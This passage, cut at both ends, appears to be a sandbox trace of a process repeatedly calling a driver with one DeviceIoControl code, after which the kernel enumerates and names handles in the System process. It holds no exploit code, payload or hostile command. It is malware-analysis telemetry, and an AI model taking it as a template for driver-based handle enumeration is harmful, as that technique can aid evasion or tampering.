lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x106, lpOverlapped=0x0) returned 1 [0198.388] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0198.388] PsAcquireProcessExitSynchronization () returned 0x0 [0198.388] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0198.388] ObReferenceObjectByHandle (in: Handle=0xffffffff8000010c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8008bc2f20, HandleInformation=0x0) returned 0x0 [0198.388] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0198.389] PsReleaseProcessExitSynchronization () returned 0x2 [0198.389] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7b [0198.389] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003160044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003160044, ReturnLength=0xfffff880052b3508) returned 0x0 [0198.389] ObfDereferenceObject (Object=0xfffffa8008bc2f20) returned 0x1 [0198.389] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0198.389] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0198.389] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0198.389] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x106, lpOverlapped=0x0) returned 1 [0198.389] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0198.389] PsAcquireProcessExitSynchronization () returned 0x0 [0198.389] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0198.389] ObReferenceObjectByHandle (in: Handle=0xffffffff80000110, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8007bfdf20, HandleInformation=0x0) returned 0x0 [0198.389] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0198.389] PsReleaseProcessExitSynchronization () returned 0x2 [0198.389] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7b [0198.389] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003161044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003161044, ReturnLength=0xfffff880052b3508) returned 0x0 [0198.390] ObfDereferenceObject (Object=0xfffffa8007bfdf20) returned 0x1 [0198.390] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0198.390] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0198.390] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0198.390] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x106, lpOverlapped=0x0) returned 1 [0198.390] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0198.390] PsAcquireProcessExitSynchronization () returned 0x0 [0198.390] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0198.390] ObReferenceObjectByHandle (in: Handle=0xffffffff80000114, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8007bfd050, HandleInformation=0x0) returned 0x0 [0198.390] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0198.390] PsReleaseProcessExitSynchronization () returned 0x2 [0198.390] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7b [0198.390] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003162044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003162044, ReturnLength=0xfffff880052b3508) returned 0x0 [0198.390] ObfDereferenceObject (Object=0xfffffa8007bfd050) returned 0x1 [0198.390] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0198.390] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0198.391] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0198.392] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x106, lpOverlapped=0x0) returned 1 [0198.392] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0198.392] PsAcquireProcessExitSynchronization () returned 0x0 [0198.392] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0198.392] ObReferenceObjectByHandle (in: Handle=0xffffffff80000118, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8008fff050, HandleInformation=0x0) returned 0x0 [0198.392] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0198.392] PsReleaseProcessExitSynchronization () returned 0x2 [0198.392] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7b [0198.392] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003201044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003201044, ReturnLength=0xfffff880052b3508) returned 0x0 [0198.392] ObfDereferenceObject (Object=0xfffffa8008fff050) returned 0x1 [0198.392] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0198.392] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0198.392] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0198.393] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x86, lpOverlapped=0x0) returned 1 [0198.393] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0198.393] PsAcquireProcessExitSynchronization () returned 0x0 [0198.393] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0198.393] ObReferenceObjectByHandle (in: Handle=0xffffffff80000130, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003435f20, HandleInformation=0x0) returned 0x0 [0198.393] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0198.393] PsReleaseProcessExitSynchronization () returned 0x2 [0198.393] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7b [0198.393] ObQueryNameString (in: Object=0xfffffa8003435f20, ObjectNameInfo=0xfffffa800312e044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800312e044, ReturnLength=0xfffff880052b3550) returned 0x0 [0198.393] ObfDereferenceObject (Object=0xfffffa8003435f20) returned 0x1 [0198.393] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0198.393] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0198.393] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0198.393] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x52, lpOverlapped=0x0) returned 1 [0198.394] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0198.394] PsAcquireProcessExitSynchronization () returned 0x0 [0198.394] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0198.394] ObReferenceObjectByHandle (in: Handle=0xffffffff80000134, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8002ebbdd0, HandleInformation=0x0) returned 0x0 [0198.394] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0198.394] PsReleaseProcessExitSynchronization () returned 0x2 [0198.394] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7b [0198.394] ObQueryNameString (in: Object=0xfffffa8002ebbdd0, ObjectNameInfo=0xfffffa800310c044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800310c044, ReturnLength=0xfffff880052b3550) returned 0x0 [0198.394] ObfDereferenceObject (Object=0xfffffa8002ebbdd0) returned 0x2 [0198.394] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0198.394] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0198.394] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0198.394] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x4a, lpOverlapped=0x0) returned 1 [0198.394] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0198.394] PsAcquireProcessExitSynchronization () returned 0x0 [0198.394] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0198.394] ObReferenceObjectByHandle (in: Handle=0xffffffff80000138, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8002ebcc10, HandleInformation=0x0) returned 0x0 [0198.394] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0198.394] PsReleaseProcessExitSynchronization () returned 0x2 [0198.394] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7b [0198.395] ObQueryNameString (in: Object=0xfffffa8002ebcc10, ObjectNameInfo=0xfffffa8003088044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003088044, ReturnLength=0xfffff880052b3550) returned 0x0 [0198.395] ObfDereferenceObject (Object=0xfffffa8002ebcc10) returned 0x1 [0198.395] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0198.395] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0198.395] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0198.395] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x76, lpOverlapped=0x0) returned 1 [0198.395] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0198.395] PsAcquireProcessExitSynchronization () returned 0x0 [0198.395] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0198.395] ObReferenceObjectByHandle (in: Handle=0xffffffff80000140, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8002ebbf20, HandleInformation=0x0) returned 0x0 [0198.395] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0198.395] PsReleaseProcessExitSynchronization () returned 0x2 [0198.395] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7b [0198.395] ObQueryNameString (in: Object=0xfffffa8002ebbf20, ObjectNameInfo=0xfffffa800307c044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800307c044, ReturnLength=0xfffff880052b3550) returned 0x0 [0198.396] ObfDereferenceObject (Object=0xfffffa8002ebbf20) returned 0x1 [0198.396] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0198.396] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0198.396] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0198.396] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0198.396] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0198.396] PsAcquireProcessExitSynchronization () returned 0x0 [0198.396] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0198.396] ObReferenceObjectByHandle (in: Handle=0xffffffff80000158, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80055f67f0, HandleInformation=0x0) returned 0x0 [0198.396] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0198.396] PsReleaseProcessExitSynchronization () returned 0x2 [0198.396] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7b [0198.396] ObQueryNameString (in: Object=0xfffffa80055f67f0, ObjectNameInfo=0xfffffa800307d044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800307d044, ReturnLength=0xfffff880052b3550) returned 0x0 [0198.397] ObfDereferenceObject (Object=0xfffffa80055f67f0) returned 0x1 [0198.397] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0198.397] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0198.397] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0198.397] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x98, lpOverlapped=0x0) returned 1 [0198.397] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0198.397] PsAcquireProcessExitSynchronization () returned 0x0 [0198.397] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0198.397] ObReferenceObjectByHandle (in: Handle=0xffffffff8000015c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003884050, HandleInformation=0x0) returned 0x0 [0198.397] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0198.397] PsReleaseProcessExitSynchronization () returned 0x2 [0198.397] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7b [0198.397] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800307e044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800307e044, ReturnLength=0xfffff880052b3508) returned 0x0 [0198.397] ObfDereferenceObject (Object=0xfffffa8003884050) returned 0x1 [0198.397] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0198.397] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0198.397] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0198.397] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x8a, lpOverlapped=0x0) returned 1 [0198.397] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0198.397] PsAcquireProcessExitSynchronization () returned 0x0 [0198.397] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0198.398] ObReferenceObjectByHandle (in: Handle=0xffffffff80000160, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8002ad4dc0, HandleInformation=0x0) returned 0x0 [0198.398] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0198.398] PsReleaseProcessExitSynchronization () returned 0x2 [0198.398] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7b [0198.398] ObQueryNameString (in: Object=0xfffffa8002ad4dc0, ObjectNameInfo=0xfffffa800314e044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800314e044, ReturnLength=0xfffff880052b3550) returned 0x0 [0198.398] ObfDereferenceObject (Object=0xfffffa8002ad4dc0) returned 0x1 [0198.398] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0198.398] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0198.398] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0198.398] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0198.398] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0198.398] PsAcquireProcessExitSynchronization () returned 0x0 [0198.398] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0198.398] ObReferenceObjectByHandle (in: Handle=0xffffffff80000170, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003a28de0, HandleInformation=0x0) returned 0x0 [0198.723] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0198.723] PsReleaseProcessExitSynchronization () returned 0x2 [0198.723] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0198.723] ObQueryNameString (in: Object=0xfffffa8003a28de0, ObjectNameInfo=0xfffffa8003082044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003082044, ReturnLength=0xfffff880052b3550) returned 0x0 [0198.723] ObfDereferenceObject (Object=0xfffffa8003a28de0) returned 0x2 [0198.723] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0198.723] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0198.723] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0198.723] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x52, lpOverlapped=0x0) returned 1 [0198.723] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0198.723] PsAcquireProcessExitSynchronization () returned 0x0 [0198.723] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0198.724] ObReferenceObjectByHandle (in: Handle=0xffffffff80000178, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8002ebc970, HandleInformation=0x0) returned 0x0 [0198.724] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0198.724] PsReleaseProcessExitSynchronization () returned 0x2 [0198.724] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0198.724] ObQueryNameString (in: Object=0xfffffa8002ebc970, ObjectNameInfo=0xfffffa8002c1e044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8002c1e044, ReturnLength=0xfffff880052b3550) returned 0x0 [0198.724] ObfDereferenceObject (Object=0xfffffa8002ebc970) returned 0x1 [0198.724] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0198.724] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0198.724] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0198.724] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0xa8, lpOverlapped=0x0) returned 1 [0198.724] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0198.724] PsAcquireProcessExitSynchronization () returned 0x0 [0198.725] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0198.725] ObReferenceObjectByHandle (in: Handle=0xffffffff80000180, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003404760, HandleInformation=0x0) returned 0x0 [0198.725] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0198.725] PsReleaseProcessExitSynchronization () returned 0x2 [0198.725] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0198.725] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003198044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003198044, ReturnLength=0xfffff880052b3508) returned 0x0 [0198.725] ObfDereferenceObject (Object=0xfffffa8003404760) returned 0x21 [0198.725] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0198.725] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0198.725] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0198.725] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0xa0, lpOverlapped=0x0) returned 1 [0198.725] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0198.725] PsAcquireProcessExitSynchronization () returned 0x0 [0198.725] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0198.726] ObReferenceObjectByHandle (in: Handle=0xffffffff80000184, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80033ec2c0, HandleInformation=0x0) returned 0x0 [0198.726] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0198.726] PsReleaseProcessExitSynchronization () returned 0x2 [0198.726] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0198.726] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800307c044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800307c044, ReturnLength=0xfffff880052b3508) returned 0x0 [0198.726] ObfDereferenceObject (Object=0xfffffa80033ec2c0) returned 0x1 [0198.726] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0198.726] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0198.726] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0198.726] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0198.726] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0198.726] PsAcquireProcessExitSynchronization () returned 0x0 [0198.726] KeStackAttachProcess (in: 